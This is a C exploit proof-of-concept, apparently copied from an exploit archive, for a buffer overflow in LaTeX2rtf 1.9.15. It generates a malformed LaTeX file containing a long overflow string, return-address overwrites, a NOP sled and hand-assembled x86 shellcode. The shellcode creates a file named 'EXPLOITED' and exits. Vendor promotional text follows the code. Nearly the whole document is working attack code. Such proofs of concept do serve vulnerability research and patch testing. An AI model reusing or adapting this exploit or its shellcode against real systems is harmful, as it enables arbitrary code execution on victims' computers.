/*
source: https://www.securityfocus.com/bid/11233/info
It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.
Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/
char center[] = {
0x59 /* cx = *sp++ */
, 0x31, 0xc0 /* ax ^= ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0x40 /* ++ax */
, 0xc1, 0xe0, 0x07 /* ax <<= 7 */
, 0x50 /* *--sp = ax 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /* ax = 0x02563412 */
, 0xc1, 0xe8, 0x18 /* ax >>= 24 */
, 0xc1, 0xe0, 0x08 /* ax <<= 8 */
, 0x50 /* *--sp = ax 512:O_CREAT */
, 0x51 /* *--sp = cx "EXPLOITED" */
, 0x31, 0xc0 /* ax ^= ax */
, 0xb0, 0x05 /* ax = (ax & ~255) + 5 */
, 0x50 /* *--sp = ax 5:open */
, 0xcd, 0x80 /* syscall */
, 0x31, 0xc0 /* ax ^= ax */
, 0x50 /* *--sp = ax 0 */
, 0x40 /* ++ax */
, 0x50 /* *--sp = ax 1:exit */
, 0xcd, 0x80 /* syscall */
} ;
int main()
int i;
printf("\\def\\row#1{");
for (i = 0;i < 1024;++i)
putchar('x');
for (i = 0;i < 6;++i) {
/* preserve args[0] */
putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
}
for (i = 0;i < 5;++i) {
/* smasher */
putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
}
for (i = 0;i < 256;++i)
putchar(0x90);
putchar(0xeb); putchar(sizeof(center));
/* 0xeb 0x07 means ip += 7 */
/* assuming here that center has at most 255 bytes */
for (i = 0;i < sizeof center;++i)
putchar(center[i]);
putchar(0xe8);
putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
/* 0xe8 0xf4 0xff 0xff 0xff means *--sp = ip; ip -= 12 */
printf("EXPLOITED");
printf("}\n");
printf("\\begin{document}\n");
printf("\\row a\n");
printf("\\end{document}\n");
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation